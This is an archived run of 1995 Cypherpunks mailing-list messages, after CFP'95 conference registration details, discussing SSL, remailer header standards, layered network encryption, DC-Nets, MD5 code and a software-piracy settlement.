FOR MORE INFORMATION ABOUT CFP'95:

Web:	http://www-techlaw.stanford.edu/CFP95.html
Gopher:	gopher://www-techlaw.stanford.edu/CFP95
FTP:	ftp://www-techlaw.stanford.edu/CFP95
Email:	Info.CFP95@forsythe.stanford.edu
Fax: 	(415) 548-0840
Call: 	(415) 548-9673


                                REGISTRATION


Please register for the conference by returning the conference
registration form along with the appropriate payment by any
method listed below. The registration fee includes conference
materials, three luncheons (Wednesday, Thursday, and Friday), two
banquets (Wednesday and Thursday) and evening receptions
(Tuesday, Wednesday, and Thursday).

Registration Fees are:

If mailed by:     February 24    March 14    after 14 March

Conference Fees      $335          $395          $445
Tutorial Fees:       $155          $185          $220

Registration is limited to 550 participants, so register early
and save!

By Mail:                                      By Fax:
(with Check or Credit Card)            (with Credit Card only)
CFP'95 Registration                    Send Registration Form
P.O. Box 6657                              (415) 548-0840
San Mateo, CA 94403                     Available 24 hours

By Phone:                            By Email (at your own risk*):
(with Credit Card only)                (with Credit Card only)
(415) 548-0840                  Register.CFP95@forsythe.stanford.edu
9 am to 5 pm Pacific Time

   *	Information for sending a PGP-encrypted registration available at
	http://www-techlaw.stanford.edu/CFP95.html and
	ftp://www-techlaw.stanford.edu/CFP95.

CFP'95 Scholarships:
The Fifth Conference on Computers, Freedom and Privacy will provide a limited 
number of full registration scholarships for students and other interested 
individuals. These scholarships will cover the full costs of registration, 
including three luncheons, two banquets, and all conference materials. 
Scholarship recipients will be responsible for their own lodging and travel 
expenses. Persons wishing to apply for one of these fully-paid registrations 
should contact CFP'95 Student Paper and Scholarship Chair, Gary Marx at: 
Gary.Marx@colorado.edu or call (303) 492-1697.

Hotel Accommodations:
The Fifth Conference on Computers, Freedom and Privacy will be held at the San 
Francisco Airport Marriott Hotel in Burlingame, CA. This  facility is spacious 
and comfortable, and is easily accessible from the airport and surrounding 
cities. Because of the intensive nature of the conference, we encourage our 
attendees to secure their lodging at the  conference facility. Special 
conference rates of $99/night, single or multiple occupancy, are available. 

*************************************************************************
* Our room block is limited and these conference rates are guaranteed   *
* only until February 17,1995, so we urge you to make your reservations *
* as early as possible.                                                 *
*************************************************************************

After February 17 but before March 15, the special conference rate will be
$110/night, single or multiple occupancy. When calling for reservations,
please be sure to identify the conference to obtain the conference rate. 
Hotel Reservations: (415) 692-9100 or (800) 228-9290 or fax (415) 692-8016.

Official Airlines:
Special convention airfare discounts have been arranged on American and United 
Airlines. Bungey Travel, (800) 286-4391 or (415) 325-5686 or fax (415) 321-
5309, will be happy to assist you in any manner. Please identify yourself as 
attending the Computers, Freedom, and Privacy Conference and you will 
automatically receive a 5% discount off nonrefundable discounted US tickets or 
10% off of all unrestricted US coach fares.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trool the Red Adept" <cdbunch@bansai.ucs.uoknor.edu>
Date: Mon, 6 Feb 95 09:58:33 PST
To: strick@yak.net>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502060202.AA03281@snark.imsi.com>
Message-ID: <9502061152.ZM18057@bansai.ucs.uoknor.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Feb 5,  9:02pm, Perry E. Metzger wrote:

> There is also SSL, which is what the Netscape people are pushing --
> stands for Secure Sockets Layer.
>
>
>-- End of excerpt from Perry E. Metzger

  Of course SSL is not really a solution.  First it requires that the server
have a well-known RSA public key.  It is also not an optional service so it
requires new well-known ports for the secure services (such as https ).  Also
for some strange reason it uses two session keys (both generated at the client
end) one for client->server and another for server->client.  Not to mention I
distrust any protocol with provisions for sending bits of my key in the clear.
	Clinton


-- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 6 Feb 95 12:13:17 PST
To: cypherpunks@toad.com
Subject: Re:  Cooperation
In-Reply-To: <199502061651.IAA02758@jobe.shell.portal.com>
Message-ID: <199502062011.MAA19947@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Hal <hfinney@shell.portal.com>

   I do like the idea of standards.  In fact I wonder if the current "mark
   1" remailer command set shouldn't be documented as an Internet RFC.  

If an RFC is issued, I personally would like to clean up the syntax
and get the remailer operators to upgrade accordingly.

In particular, I chose Request-Remailing-To: as a purposefully obtuse
experimental name.  It deserves to die.

My preferences are for the following:

Anon-Send-To: for anonymized email
Send-To: for normal forwarded email
Anon-Post-To: for anonymized Usenet posting
Post-To: for a regular mail-to-Usenet gateway

I want to capture the distinction between Usenet and email as well as
to support plain forwarding of text for people with connectivity
problems.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 6 Feb 95 12:25:10 PST
To: cypherpunks@toad.com
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502061025.AA03724@snark.imsi.com>
Message-ID: <199502062023.MAA19967@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   Eric Hughes says:
   > Perry advocates IPSP as an almost-panacea for Internet security.  I
   > disagree.

   Well, no; it doesn't fix things like mail for which the data needs to
   be protected but not the link. 
   
In the case of email, there's the same discrepancy I pointed out
earlier -- the machine or filesystem boundary is not the same as the
trust boundary.  This will happen for email as well as more live and
online communications needs.

   TIA is sort of a short term hack people are using to get around having
   to have their administrators manage SLIP or PPP properly; I suspect
   this difficulty will vanish with time.

I agree with you that this particular example may be short lived, but
you appear to have ignored the more fundamental point I was making.
Namely, the existence of communications proxies which _change_ the
level of abstraction will be with us forever.  The TIA unix end
switches from TCP-to-the-world to IP-to-the-PC.  That's a level
switch.

   IP is ultimately designed to be a proxy protocol that will work over
   anything -- stuff like TIA simply gets around temporary mental
   difficulties among providers in seeing things that way...<

I'm not saying that IP proxies won't exist.  What I am saying is that
other forms of proxying will also exist.  Not all policies will be
able to be enforced at the IP level.  As soon as you want security
policy to apply to non-IP abstractions, IPSP is no longer primary,
even if it's still involved.

Firewall policies are a prime example of security policy enforced at
the TCP and UDP levels, with access control by port number.  External
firewalls, a class that includes packet laundries, web proxies, and
IRC anonymizers, will not for the most part operate at the IP level.

It's certain that IP security will greatly increase the overall
security of the Internet.  I'm not advocating its removal but rather
the acknowledgement that higher (and lower) level abstractions will
require their own cryptography.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.sf.ca.us>
Date: Mon, 6 Feb 95 12:29:02 PST
To: cypherpunks@toad.com
Subject: RE: Firewall chips
Message-ID: <199502062028.MAA25818@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain




>> Actually, there is a germ of truth in this.  On older phones
>>(don't know if  this works on newer electronic phones) when the
>>handset is 'on-hook' a  switch opens and breaks the voice
>>circuit. This of course only works for DC circuits.  If you drive
>>that same circuit with an AC signal . . .

>There's another angle I may have mentioned before.  Many 
>electronic phones come with a ``feature'' that allows you to 
>call home, produce an electronic tone and eavesdrop on your own
>house.  When the tone is sounded, the ringing stops (or never
>starts) and the phone goes into ``off hook'' mode (i.e., the
>microphone in the mouthpiece is turned on).

>Even if you did not buy this feature when you bought your phone,
>it is still there, just waiting for that electronic tone.  You 
>can't produce it, because you didn't buy the doohickey, but anyone
>with such a doohickey can call your house and listen in. . .


> S a n d y

>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Devices of this type are known generically as "infinity
transmitters." They will not function anywhere the phone network is
run by a digital (4ESS or better) switch.

 In a modern switch, the ringing you hear is being generated by the
switch, the switch is simultaneously ringing the number you dialed,
however the two are not physically connected. The actual connection
is not made untill the far end answers, this was implemented to
stop various types of fraud, and unauthorized eavesdropping.


Brian D Williams
Cypherpatriot

 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 6 Feb 95 12:48:48 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: dna ink
Message-ID: <v0151010eab5c172d0d6e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 2/5/95, Dan Harmon wrote:
>I just saw an item on CNN about a company in LA called Art Guard.  It
>sells an ink that is created using your dna as a protection against
>forged signatures.

Why not just sign in blood?


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Mon, 6 Feb 95 09:56:05 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: dna ink
In-Reply-To: <Pine.3.89.9502052222.B22385-0100000@Joyce-Perkins.tenet.edu>
Message-ID: <199502061755.MAA14493@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Dan Harmon:
: 
: 
: I just saw an item on CNN about a company in LA called Art Guard.  It 
: sells an ink that is created using your dna as a protection against 
: forged signatures.
: 
: Interesting.
: 
: Dan
: 
: 

Faustus ... Faustus ... Why do you delay?

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzZicx0c4/pqJauBAQGgqQQAqOgSZNxJsR3UdEqASFUQ39divPhvbHnk
AIzG+Jut+CHm0DE+CvMb9ZHzPI6JTQt5gYSuN9OSqHkZ82uxv5gPJOvxHq3PXYoD
iaKkxnXPilWImuVHOUHVBpaCibfzdM4ZxYsj0bJSA8juB5G29LDI/3JeUvo8eJFX
A+wWkjbawIc=
=bpge
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 6 Feb 95 10:09:51 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502061025.AA03724@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950206130709.20818A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Perry E. Metzger wrote:

> Remember, by the way, that PPP is far cheaper per customer than shell
> accounts, even though moronic providers right now don't make it look
> that way.

PPP/SLIP is currently not cheaper per customer - if you figure in the 
time your help desk staff put in over the first couple of weeks of a new 
customer coming on line.  Many people who have barely ever used a BBS are 
deciding they "need their internet connection" and going SLIP/PPP even 
where a shell account would do most of what they want.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 6 Feb 95 10:14:00 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Cooperation
In-Reply-To: <199502061154.DAA11069@netcom15.netcom.com>
Message-ID: <Pine.SUN.3.91.950206131048.20818B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Timothy C. May wrote:

> Yes! Standards are not collusion. In fact, standards can lessen the
> amount of ad hoc contact needed between remailer operators, and thus
> reduce somewhat the prospects for compromise and collusion.

If someone adds the secure coin-flip exchange between chain neighbors to
my Dining Cryptographers IRC client, all remailer operators can go on IRC 
and anonymously discuss the standards so that no cabals can form ;)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 6 Feb 95 13:15:06 PST
To: cypherpunks@toad.com
Subject: Re: Cooperation
In-Reply-To: <9502062043.AA05429@snark.imsi.com>
Message-ID: <199502062113.NAA20075@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   Eric says:
   > In particular, I chose Request-Remailing-To: as a purposefully obtuse
   > experimental name.  It deserves to die.

   From: "Perry E. Metzger" <perry@imsi.com>

   I'd say that it would work far better if things were changed to MIME
   formats. You would send a message by recursively encapsulating your
   message to be remailed inside a MIME message. Simple and clean...

That's fine.  I like MIME, but the issue is cleaning up the existing
remailers, none of which use MIME, and the chaining scripts, none of
which do either.

Getting everybody to support Anon-Send-To: in addition to
Request-Remailing-To: is a very simple and straightforward fix for an
acknowledged syntactic inanity.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 10:30:41 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <Pine.SUN.3.91.950206130709.20818A-100000@thrash.src.umd.edu>
Message-ID: <9502061830.AA04828@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> On Mon, 6 Feb 1995, Perry E. Metzger wrote:
> 
> > Remember, by the way, that PPP is far cheaper per customer than shell
> > accounts, even though moronic providers right now don't make it look
> > that way.
> 
> PPP/SLIP is currently not cheaper per customer - if you figure in the 
> time your help desk staff put in over the first couple of weeks of a new 
> customer coming on line.

Thats because the providers never package things up cleanly. If they
sent a client on a disk, a la AOL, and they set things up to
autoconfigure, they'd never need to speak to the clients.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Mon, 6 Feb 95 07:45:16 PST
To: cypherpunks@toad.com
Subject: Camden New Jersey
Message-ID: <9502061348.AA14911@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



I thought nothing but armed robberies happened in Camden New Jersey.

Teenage Pirate To Pay $25,000, Loses BBS Equipment
CAMDEN, NEW JERSEY, U.S.A., 1995 FEB 3 (NB) -- A teenage computer operator
charged with illegally distributing hundreds of copyrighted commercial
software programs has reached a settlement with Novell Inc., (NASDAQ: NOVL)
and Microsoft Corp., (NASDAQ: MSFT).

The settlement requires the operator of the now-defunct Deadbeat Bulletin
Board to pay $25,000 to Novell and Microsoft and forfeit the equipment he
used to run the board to the two software makers.

The agreement apparently closes the book on an investigation of the New
Jersey computer BBS (bulletin board service), which authorities said
contained several hundred commercial software products. The equipment was
seized in an August raid of the board.

This was just one of the cases investigated under an aggressive joint
campaign by Novell and Microsoft to locate and prosecute pirate system
operators. The project was mounted last summer and has already resulted in
the closing of two bulletin boards. The two companies said they expect more
seizures in the near future.

Pirate bulletin boards let users download commercial products, paying for
them in money or in barter by uploading programs the BBS doesn't have.
According to Novell the Deadbeat Bulletin Board also contained several beta
files, software which is still in the testing stage. Beta programs are often
incomplete or contain problems, and are distributed to a limited number of
users so those problems can be worked out before the final product comes to
market.

Novell and Microsoft investigators said they first got wind of the illegal
software in late July, and eventually discovered more than 60 Novell and
Microsoft products on the board. A court ordered seizure of the equipment and
the raid was carried out in August. The court records have been sealed until
now.

The agreement also prohibits Microsoft and Novell from any further action
against the 17-year old boy and from releasing his name.

(Jim Mallory/19950203/Press contact: Jessica Jersey, Novell, 408-577-8739;
Public contact: 800-785-3448 or 800-747-2837 to report suspected software
piracy)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Mon, 6 Feb 95 14:09:54 PST
To: eric@remailer.net>
Subject: Re: "encrypt tcp connections" hacks
Message-ID: <Chameleon.4.01.950206140937.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>It's certain that IP security will greatly increase the overall
>security of the Internet.  I'm not advocating its removal but rather
>the acknowledgement that higher (and lower) level abstractions will
>require their own cryptography.

This resolves to a layered quality-of-service issue.  Encryption and
authentication at the network layer provides an excellent base for
improving security, and in and of itself solves a lot of problems like
packet payload sniffing, session stealing, etc.

But as you so aptly point out, trust boundaries do not coincide with
network boundaries.  Applications that "ride" on top of TCP and UDP may
have their own, very different, threat models.  And sniffing the
physical layer provides most of what you need for traffic analysis
unless some sort of sophisticated packet laundering is used.

You pointed this out to me at the last cpunks meeting--each layer in the
network model needs to be able to ask for and use security facilities in
the lower layer, as well as advertise its security features to the next
layer up. 

Of course, it is perfectly reasonable for me to expect to write an
email, encrypt it with PGP and send it via an encrypted SMTP protocol to
my mail gateway.  On its way, it will ride on top of an encrypted TCP
session to port 25, with the physical T1 link between my site and the
internet encrypted as well.  This is an example of security features
present at most of the layers between 1 and 7 of the OSI model.  These
should remain independent.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                    http://ftp.netcom.com/pub/jc/jcorgan/home.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzad6E1Diok8GKihAQExdAP+LZvM2rbJWf6WwIs2oHPjfWRCyXAQTnYm
gpMld86xiJeM5AKudlH2YW+b12lv+9wdH71Fo38FNOdLDX7xDkXQzmkz2creV7sQ
GCfrJOAObLro8vwpZ5LVwin0qvmZzH4PO7to2Th3iYGbrXh4zoOdr5GNLU8j+wTd
HcV9N6nELxg=
=iNH8
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: philip@cs.brandeis.edu (Philip Trauring)
Date: Mon, 6 Feb 95 10:59:56 PST
To: cypherpunks@toad.com
Subject: MD5 coding
Message-ID: <ab5c1c670202100461ba@[129.64.123.61]>
MIME-Version: 1.0
Content-Type: text/plain


I am looking to put together an MD5 message digest program and have
extracted the MD5.c and MD5.h files from PGP(excerpt of the MD5.h file
below) but I'm not sure how it all works. Can someone who is familiar with
the functions and the data structure please e-mail me with a bit of
guidance as to what each one does and how to implement it. If anyone can
lead me to a good description of the processes involved I would appreciate
that too. Thanks.

----====----
struct MD5Context {
        uint32 buf[4];
        uint32 bits[2];
        unsigned char in[64];
};

void MD5Init(struct MD5Context *context);
void MD5Update(struct MD5Context *context, unsigned char const *buf,
unsigned len);
void MD5Final(unsigned char digest[16], struct MD5Context *context);
void MD5Transform(uint32 buf[4], uint32 const in[16]);
----====----

        Philip Trauring

--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--
    Philip Trauring                     Brandeis University MB1001
    philip@cs.brandeis.edu              P.O. Box 9110
    (617) 736-5282 ['94/95]             Waltham, Ma  02254-9110
--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.sf.ca.us>
Date: Mon, 6 Feb 95 14:13:47 PST
To: cypherpunks@toad.com
Subject: RE: DNA ink
Message-ID: <199502062213.OAA11162@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain



>>Lucky Green says:
>> At 10:30 PM 2/5/95, Dan Harmon wrote:
>>I just saw an item on CNN about a company in LA called Art Guard. 
>>It sells an ink that is created using your dna as a protection
>>against forged signatures.
>> 
>> Why not just sign in blood?

>The same occured to me.

>Perry

 Yes, this would work even better! If the ink just contained your
DNA, someone could use PCR to duplicate it! If you actually signed
in blood, they would have to match the type and if a white blood
cell was there they would have to "forge" the mitochondria since
they have different DNA! This is not to mention other blood
factors.

 There is prime material here for Klaus! on the the difficulties of
running "blood remailers" "anonymous bloodletting," etc.....


Brian D Williams
Cypherpatriot


"Prime material here"  heh heh!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Sun, 5 Feb 95 19:18:28 PST
To: cypherpunks@toad.com
Subject: Re: Judge not...
In-Reply-To: <199502060147.RAA25515@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950206141712.8260C-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Feb 1995 anonymous-remailer@shell.portal.com wrote:

[ I wonder why he/she/it wishes to remain anonymous? ]

> Here's something I though would probably be of interest to more than a
> few here that read Usenet news.  First article is the "Cancel FAQ" put out
> by the "Judges List", which many may have seen on the new.admin.*
> groups.  Following it is the "Judges List" FAQ.  

Thanks - I hardly read the news.* hierarchy these days.

> I doubt this is a major threat, but is a good example of the sort of
> thing that needs to be nipped in the bud.

Why?

> If the "Cancel FAQ" doesn't trip any alarms, be sure to read the
> following "Judges List" FAQ.  

I did - I don't have a problem with it.  Do you?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 6 Feb 95 11:43:50 PST
To: philip@cs.brandeis.edu (Philip Trauring)
Subject: Re: MD5 coding
In-Reply-To: <ab5c1c670202100461ba@[129.64.123.61]>
Message-ID: <199502061946.OAA00186@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I am looking to put together an MD5 message digest program and have
| extracted the MD5.c and MD5.h files from PGP(excerpt of the MD5.h file
| below) but I'm not sure how it all works. Can someone who is familiar with
| the functions and the data structure please e-mail me with a bit of
| guidance as to what each one does and how to implement it. If anyone can
| lead me to a good description of the processes involved I would appreciate
| that too. Thanks.

	I seem to recall that md5 is explained pretty well in
Schneier.  You may be doing this to learn, which is great, but you
might be pleased to know that there are several md5 programs already
available.  Tripwire includes one, and there was one included in a
CERT/CIAC advisory last year.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: philip@cs.brandeis.edu (Philip Trauring)
Date: Mon, 6 Feb 95 12:15:03 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: MD5 coding
Message-ID: <ab5c33b100021004dc51@[129.64.123.61]>
MIME-Version: 1.0
Content-Type: text/plain


>        I seem to recall that md5 is explained pretty well in
>Schneier.  You may be doing this to learn, which is great, but you
>might be pleased to know that there are several md5 programs already
>available.  Tripwire includes one, and there was one included in a
>CERT/CIAC advisory last year.
>
>
>Adam

I need a version that will run on a Mac also which is the version I am
putting together now. I know there are versions for DOS and other platforms
but I specifically need to be able to run it on a Mac since the server I am
producing is Mac-based.

        Philip Trauring


--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--
    Philip Trauring                     Brandeis University MB1001
    philip@cs.brandeis.edu              P.O. Box 9110
    (617) 736-5282 ['94/95]             Waltham, Ma  02254-9110
--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--=====--=--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 12:44:12 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Cooperation
In-Reply-To: <199502062011.MAA19947@largo.remailer.net>
Message-ID: <9502062043.AA05429@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric says:
> If an RFC is issued, I personally would like to clean up the syntax
> and get the remailer operators to upgrade accordingly.
> 
> In particular, I chose Request-Remailing-To: as a purposefully obtuse
> experimental name.  It deserves to die.

I'd say that it would work far better if things were changed to MIME
formats. You would send a message by recursively encapsulating your
message to be remailed inside a MIME message. Simple and clean...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Katy Kislitzin <ktk@anemone.corp.sgi.com>
Date: Mon, 6 Feb 95 16:02:37 PST
To: rem-conf@es.net
Subject: preliminary cypherpunks announcement
Message-ID: <199502070002.QAA28857@anemone.corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


hi!  we're going to try again to broadcast this saturday's sf bay area
cypherpunks meeting.  Scheduled time is Feb 11, 1pm - 6pm.
Crypto-anarchy will be the order of the day, as usual; will post a
real announcement with speakers and topics shortly.  Please let me
know asap if there are conflicts...

--kt
Katy Kislitzin
Silicon Graphics
I/S Network Software
ktk@corp.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 6 Feb 95 13:31:30 PST
To: shamrock@netcom.com (Lucky Green)
Subject: Re: dna ink
In-Reply-To: <v0151010eab5c172d0d6e@[192.0.2.1]>
Message-ID: <9502062129.AA05503@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green says:
> At 10:30 PM 2/5/95, Dan Harmon wrote:
> >I just saw an item on CNN about a company in LA called Art Guard.  It
> >sells an ink that is created using your dna as a protection against
> >forged signatures.
> 
> Why not just sign in blood?

The same occured to me.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 6 Feb 95 14:08:37 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Cooperation
Message-ID: <ab5c4d2f0902100430ee@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:43 PM 02/06/95, Perry E. Metzger wrote:
>I'd say that it would work far better if things were changed to MIME
>formats. You would send a message by recursively encapsulating your
>message to be remailed inside a MIME message. Simple and clean...

Well... perhaps for a future remailer standard.  I think the purpose of an
RFC at this point is to clearly outline how it is that present remailers
work, and standardize the working somewhat, and provide a document for
people writing new remailers to look at to make sure their remailers work
like everyone elses (or are a superset of the "Standard Type 1 Remailer"
functions, a superset which certainly could include MIME or anything else).
The point is to accurately describe how most remailers work now, rather
then propose a major change in the way most remailers work.  The latter has
a place, but the former seems more pressing, as well as easier to do, and
perhaps a first step to the latter.

Changing "Request-Remailing-To:" to "Anon-Send-To:" is trivial, in that it
would be an incredibly minor code change, and in that some remailers
already implement "Anon-Send-To:".  But changing everything to MIME would
not be so trivial, and if we published a "standard" that said to do it with
MIME, we'd end up with a standard that in fact no one follows, that doesn't
accurately describe the way things are.  The remailers are definitely
evolving,  and it's been mentioned that it might be a good idea to have a
Type 1 Remailer standards document, and a Type 2 Remailer standards
document, etc.  But it seems of primary importance to first publish a
standard of how the remailers _are_ (Type 1 remailer), instead of how we
might wish they could be.   (Type 1 remailer with MIME, Type 2 remailer,
whatever).

As for the idea of using MIME headers in itself, I'm a bit concerned that
it might make it overly complicated to put together a to-be-remailed
message by hand.  I'm not entirely familiar with MIME and recursive
encapsulation of MIME, so my concern might be ungrounded.  But I think it
might be a Good Thing that it's easy to remail a message by hand by adding
a simple "::\nAnon-Send-To:" at the top, and it would be a mistake to make
it more complicated or dificult to do this by hand, unless it's really
neccesary for some reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 6 Feb 95 17:23:00 PST
To: cypherpunks@toad.com
Subject: a simple explanation of DC-Net
Message-ID: <199502070122.AA01568@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The DC-Net is not very easy to understand.  I'll try to explain the most
important parts of the concept as simply as I can.

Let's say there are a number of participants in a DC-Net.  Each
participant shares a different one-time pad with each of several other
participants.

At most one participant can send one bit through the DC-Net per "round".
How does this work?  For each round i, a participant takes the i-th bit
of all the one-time pads that he has and XORs them together.  If he
doesn't want to send a bit, he just broadcasts the resulting bit to
every other participant.  If he DOES want to send a bit, then he
broadcasts the XOR of that resulting bit and the bit he wants to send.
When everyone has done this, each participant takes all of the bits that
has been broadcasted, and XORs them together.  This last action produces
the output of the DC-Net for the i-th round.

Suppose for the first round nobody wants to send a bit.  Since each one-
time pad is known by 2 participants, the first bit of each pad has been
XORed into the final output twice.  Since anything XORed by anything
twice equals itself, these two XORs cancel each other out.  And since
nothing else has been XORed into the output, the output must equal 0.

If one participant wanted to send a bit, however, then something else
HAS been XORed into the output.  Since all the bits from the one-time
pads cancel out, the output equals the bit he wanted to send.

Wei Dai

P.S.  I realize someone has probably written something like this
already, but I hope this explanation helps someone who is still
puzzled.  If nothing else, it serves as a sanity check on my own
understanding.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzbKfTl0sXKgdnV5AQGTpwQAtGe5zl91MgA/ayzBGo/DLXh7NyTDSw00
h/qZZxh2U9HoNFLHMMiHV64PYE8poJlCH8kLDY+XZlv1phoiBtMnc2AehN5XVJmr
YCQ77rH9vp6yk6SZ5F7HV/UNIIQj6TkW806OZP7LlgUrXWPZdCSYGPh7n60J4TkD
RaspzTgFcUk=
=ml6y
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 6 Feb 95 19:27:53 PST
To: perry@imsi.com
Subject: Re: dna ink
In-Reply-To: <9502062129.AA05503@snark.imsi.com>
Message-ID: <199502062339.RAA00978@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Lucky Green says:
> > At 10:30 PM 2/5/95, Dan Harmon wrote:
> > >I just saw an item on CNN about a company in LA called Art Guard.  It
> > >sells an ink that is created using your dna as a protection against
> > >forged signatures.
> > 
> > Why not just sign in blood?
